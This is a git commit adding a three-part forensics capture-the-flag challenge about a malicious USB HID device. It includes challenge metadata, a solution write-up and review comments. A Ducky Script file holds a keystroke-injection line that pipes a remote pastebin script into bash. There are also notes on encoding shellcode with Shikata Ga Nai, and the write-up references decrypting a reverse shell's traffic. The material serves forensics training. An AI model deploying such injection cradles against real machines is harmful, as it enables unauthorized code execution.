Commit

forensics(HIDden): add 3-part challenge
s3nn authored Apr 30, 2024
1 parent c14d3c6 commit 07ed1eb
Showing 39 changed files with 849 additions and 0 deletions.
26 changes: 26 additions & 0 deletions forensics/HIDden-1/challenge.yml
@@ -0,0 +1,26 @@
name: "HIDden-1"
author: "s3nn"
category: forensics

description: |
You are thrust into a clandestine digital realm, where enigmatic forces threaten global stability. As a recruit of an elite cyber task force, your mission is to navigate the shadowy depths of encrypted networks. Unravel the mysteries of covert communications, decrypt encrypted traffic, and decipher the intentions behind cryptic commands. Amidst the chaos, you'll confront the challenge of dissecting obscure digital artifacts, piecing together their secrets to safeguard the digital frontier. Are you prepared to dive into the unknown and emerge as a master of the digital domain?
value: 500
type: dynamic
extra:
initial: 500
minimum: 100
decay: 25

flags:
- CCSC{Dis4bling_USBs_D03s_n0t_Dis4ble_HID}

tags:
- forensics

files:
- "public/inject.bin"
- "public/traffic.pcapng"

state: visible
version: "0.1"
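Review bot: the `description` gives players no indication that this is part 1 of a three-part challenge, even though the commit title says so and the other two parts carry their own flags; a short closing sentence along the lines of "Part 1 of 3: the other parts are separate challenges" would save solvers from submitting the part 2 or part 3 flag here. The rest of the entry (dynamic scoring block, `files` list pointing at `public/inject.bin` and `public/traffic.pcapng`) reads fine.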
Binary file added forensics/HIDden-1/public/inject.bin
Binary file not shown.
Binary file added forensics/HIDden-1/public/traffic.pcapng
Binary file not shown.
9 changes: 9 additions & 0 deletions forensics/HIDden-1/setup/ducky_cradle.txt
@@ -0,0 +1,9 @@
REM part1

DELAY 1000
CTRL-ALT t
DELAY 1000
STRING bash <(curl -ski https://pastebin.com/raw/bLfwPMuM) # CCSC{Dis4bling_USBs_D03s_n0t_Dis4ble_HID}
DELAY 2000

ALT F4
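Review bot: the `STRING` line uses `curl -ski`, and `-i` makes curl emit the HTTP response headers before the body, so the process substitution hands `bash` the status line and header lines first and the shell will fail on each of them before reaching the script; if that noise is not deliberately part of the recorded session, `-sk` without `-i` is what was presumably intended. The trailing `# CCSC{...}` comment is what makes the part 1 flag recoverable from the decoded keystrokes, so that part is consistent with `sol/Sol.md`.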
Binary file added forensics/HIDden-1/setup/flag3.exe
Binary file not shown.
1 change: 1 addition & 0 deletions forensics/HIDden-1/setup/flag3.exe.b64
@@ -0,0 +1 @@
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAABBAAAAAAABAAAAAAAAAAFARAAAAAAAAAAAAAEAAOAAFAEAABAADAAEAAAAEAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAiAEAAAAAAACIAQAAAAAAAAAQAAAAAAAAAQAAAAcAAAAAEAAAAAAAAAAQQAAAAAAAABBAAAAAAAAjAQAAAAAAACMBAAAAAAAAABAAAAAAAAAEAAAABAAAAFgBAAAAAAAAWAFAAAAAAABYAUAAAAAAADAAAAAAAAAAMAAAAAAAAAAIAAAAAAAAAFPldGQEAAAAWAEAAAAAAABYAUAAAAAAAFgBQAAAAAAAMAAAAAAAAAAwAAAAAAAAAAgAAAAAAAAAUeV0ZAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAEAAAAIAAAAAUAAABHTlUAAQABwAQAAAABAAAAAAAAAAIAAcAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOjwAAAA6wXU5VeLkkjB1wBFMFkUxVaWztd3ngLi9v//AEQwPAtEAjwL4vY7ayzshISEdLJprq6urpCfYIEOrvsZFG3y8vLiaFjglu0DtwxU9i+h4UnNH6soWMMeTeEhCUkx5D0+tQJImclxIVXFAUnxKxSK2ozPE5vLjExMTExM+rF2dnZ2ZixZbUn9unhwcHBuWVwKd2O3/0JZDQ7KMnhJdd//EVkO6aFcEkTPvm8mDkiGwL50dHR0ZCol2t5kkYbkzCS+zcrLItbw8e7v7lbOWtavD4cGdJA+V9/uroQB2lBdT6QUUhWlmZmZGU0Ew8PDw7uqWUnB6wDrBSrONutLgWkLBHmpy4FpD/6Uy82BQRMpiKmK6wXGQeVHXvdRF//hAAAuc2hzdHJ0YWIALm5vdGUuZ251LnByb3BlcnR5AC5zaGVsbGNvZGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAA
BwAAAAIAAAAAAAAAWAFAAAAAAABYAQAAAAAAADAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAHgAAAAEAAAAHAAAAAAAAAAAQQAAAAAAAABAAAAAAAAAjAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAADAAAAAAAAAAAAAAAAAAAAAAAAACMRAAAAAAAAKQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA=
Binary file added forensics/HIDden-1/setup/sc.bin
Binary file not shown.
Binary file added forensics/HIDden-1/setup/sc.sgn
Binary file not shown.
129 changes: 129 additions & 0 deletions forensics/HIDden-1/setup/template.x64.py
@@ -0,0 +1,129 @@
# File used to create / deug shellcode
# taken from: https://github.com/nobodyisnobody/docs/tree/main/modern.templates.for.shellcoding

context.log_level = 'error'
from pwn import *
context.terminal = ['kitty', '@', 'launch', '--cwd', 'current', '--location', 'hsplit', '--title', 'DEBUG']
context.update(arch="amd64", os="linux")

if (len(sys.argv) < 1):
print('%s [RUN or GDB or EXE]' % (sys.argv[0]))
exit(1)

def dumpit(shellc):
print('shellcode length: {:d} bytes'.format(len(shellc)))
# dump as hex number array
print('\n\"\\x{}\"'.format('\\x'.join([format(b, '02x') for b in bytearray(shellc)])))
# dump as C array
print("\nunsigned char shellc[] = {{{}}};".format(", ".join([format(b, '#02x') for b in bytearray(shellc)])))
# dump as hex array
print('\npossibly problematic values are highlighted (00,0a,20)...\n')
print(hexdump(shellc, highlight=b'\x0a\x20\x00'))

# put your shellcode here
shellc = asm('''
/* Check GID and exit */
mov rax, 104
mov rdi, 0
syscall
cmp eax, 0xdeadbeef
jne exit
/* push ctx */
push 0x30
mov rax, 0x6e595c687b446667
push rax
mov rax, 0x4c53635b767f4c52
push rax
mov rax, 0x516867077d592774
push rax
mov rax, 0x3e435a4c50645074
push rax
/* Read key */
sub rsp, 8
mov rax, 0
mov rdi, 0
lea rsi, [rsp]
mov rdx, 8
syscall
lea rbx, [rsp]
mov rbx, [rbx]
add rsp, 8
/* xor(0x13371337, 'rsp', 0x20) */
xor rax, rax
push 0x20
pop rsi
mov rdi, rsp
add rsi, rdi
start_6:
mov rcx, [rdi]
xor ecx, ebx
mov rdx, 0xcafebabe
add rdi, 4
cmp rdi, rsi
jb start_6
/* push Try Harder */
push 0x1010101 ^ 0x7265
xor dword ptr [rsp], 0x1010101
mov rax, 0x6472614820797254
push rax
pop rcx
xor rax, rax
xor rbx, rbx
xor rdx, rdx
jmp exit
exit:
mov rax, 60
mov rdi, 0
syscall
''')

dumpit(shellc)

if args.WRITE:
with open('sc.bin', 'wb') as f:
f.write(shellc)

if args.EXE:
ELF.from_bytes(shellc).save('binary')

if args.RUN:
p = run_shellcode(shellc)
p.interactive()
elif args.GDB:
p = debug_shellcode(shellc, gdbscript='''
# set your pwndbg path here
init-pwndbg
b *0x401010
b *0x401066
c
set $rax=0xdeadbeef
c
''')
p.send(p64(0x13371337))
p.interactive()

# =-=- Xor stuff =-=-=

# flag = b'CCSC{It-C4nn0t_Be_Helpd_Push_On}
# ctx = b"tPdPLZC>t'Y}\aghQRL\177v[cSLgfD{h\\Yn0"
# key = 0x13371337

# =-=-=- ELF stuff =-=-=-=
# Final ELF was created after writing shellcode to disk, encoding with shikata ga nai and then creating ELF using pwntools from python REPL:

# =-=-= Encode and build =-=-=-
# shikata gai nai: https://github.com/EgeBalci/sgn

# python template.x64.py WRITE
# shikata-ga-nai/sgn -i sc.bin -o sc.sgn -a 64 -v

# (Python REPL) : with open('sc.sgn', 'rb') as f:
#. ..: ELF.from_bytes(f.read()).save('flag3.exe')
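Review bot: `context.log_level = 'error'` runs before `from pwn import *`, so `context` is undefined at that point and the script dies with a `NameError` on its first statement; move the import above it. The guard `if (len(sys.argv) < 1)` can never be true because `sys.argv[0]` is always present, so the usage message is unreachable (`< 2` was presumably meant, and since the modes are read via pwntools' `args.WRITE` / `args.EXE` / `args.RUN` / `args.GDB`, the message should name those instead of `RUN or GDB or EXE`). In the shellcode, the `start_6` loop computes `xor ecx, ebx` but never stores the result back to `[rdi]`, and `mov rdx, 0xcafebabe` is dead; the solution text relies on this ("the result is still garbage"), so a comment saying the loop is intentionally a decoy would help whoever maintains the challenge. Typo in the header comment: "deug" for "debug".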
53 changes: 53 additions & 0 deletions forensics/HIDden-1/sol/Sol.md
@@ -0,0 +1,53 @@
# Solution

## Part 1

Decode inject.bin into Ducky Script using https://github.com/dagonis/Mallard

```bash
python mallard/__main__.py -f inject.bin
```

We also get pastebin URL: https://pastebin.com/raw/bLfwPMuM

<details>
<summary>Reveal Flag</summary>
CCSC{Dis4bling_USBs_D03s_n0t_Dis4ble_HID}
</details>

## Part 2

View pastebin and see that the following tool was run on the victim: [TinkererShell.py](https://github.com/4n4nk3/TinkererShell)

After browsing the code, it can be determined that the reverse shell is using a symmetric hard-coded key and AES EAX.Mode. Thankfully the tool has encrypt / decrypt functions and the transmission is in JSON format (encrypted).

So we can pull the JSON lines from the pcap file and feed them into the decryption functions to see the reverse shell comms.

On one line we see that the attacker has cat'd a file called flag.txt which is the flag for part2

The [aes.py](./aes.py) file provides the extracted encrypt / decrypt functions with the extracted encrypted traffic so you can just run it to see the decrypted values.

<details>
<summary>Reveal Flag</summary>
CCSC{part2-N1ce_One-Decrypting_Th3_C0mms}
</details>

## Part 3

From the PCAP we can also see that an attacker has uploaded a large file which is a base64-encoded ELF file.
After decrypting and decoding the file locally, we start debugging the ELF file.

This has been encoded using the Shikata Ga Nai polymorphic encoder so it makes static analysis extremely hard.

After some dynamic analysis and allowing the program to decode itself, we get to a point where the program checks the user's gid and exits if it does not match `0xdeadbeef`. This can be bypassed directly from a debugger or creating a new group.

Secondly, we see that 4 qwords are pushed onto the stack but appear to be garbage.

Thirdly, we see that the program asks for 8 bytes of input and uses the first 4 bytes as a xor key. This key is xored with every QWORD previously pushed onto the stack, one by one. However, the result is still garbage.

At this point, it can be deduced that the 4 QWORDS pushed onto the stack are the flag and the first 4 bytes are `CCSC`, a known plaintext. If we take these bytes and xor them with the first DWORD pushed onto the stack, we get the actual xor key `0x13371337`. We can then modify the program or extract the bytes and xor offline to get the final flag.

<details>
<summary>Reveal Flag</summary>
CCSC{It-C4nn0t_Be_Helpd_Push_On}
</details>
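Review bot: in Part 3, "the first DWORD pushed onto the stack" is ambiguous and, read literally, points at the wrong value: the dword that recovers the key is the low dword of the qword at the lowest stack address, which in `setup/template.x64.py` is the last one pushed (`0x3e435a4c50645074`); `0x50645074 ^ 0x43534343` (`CCSC` read as a little-endian dword) gives `0x13371337`, so say "the dword at the start of the buffer" or "the last qword pushed". Part 2 links `./aes.py` next to this file; that file is not among the hunks rendered here, so confirm it is included in the commit. Minor wording: "cat'd" reads better as "cat'ed" or "printed", and "part2" should be "part 2".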
